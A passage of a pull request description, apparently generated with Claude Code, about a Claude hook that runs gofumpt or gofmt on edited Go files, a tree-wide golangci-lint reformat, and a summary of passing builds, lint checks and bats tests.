- **Claude hook** (`.claude/hooks/go-fmt.py`): format edited `.go` files with `gofumpt` when installed, falling back to `gofmt` otherwise, so **editor-time formatting matches what CI enforces**. Added a bats case asserting the gofumpt-specific rule (blank-after-brace removal) — version-independent, unlike the `0o` octal rule.

## Reformat (commit 2)
`golangci-lint fmt` across the tree: `0644`→`0o644`, grouped `var (...)` blocks, no blank lines at block edges, etc. **Pure formatting, no behavior change.**

## Testing
`go build ./...`, `go vet ./...`, `golangci-lint run ./...` (**0 issues**, now gofumpt-enforced), `bats .claude/hooks/go-fmt.bats` (**6/6**), and the test suite all pass. The only non-`.go` changes are the 4 policy files. No CHANGELOG (internal formatting/tooling).

🤖 Generated with [Claude Code](https://claude.com/claude-code)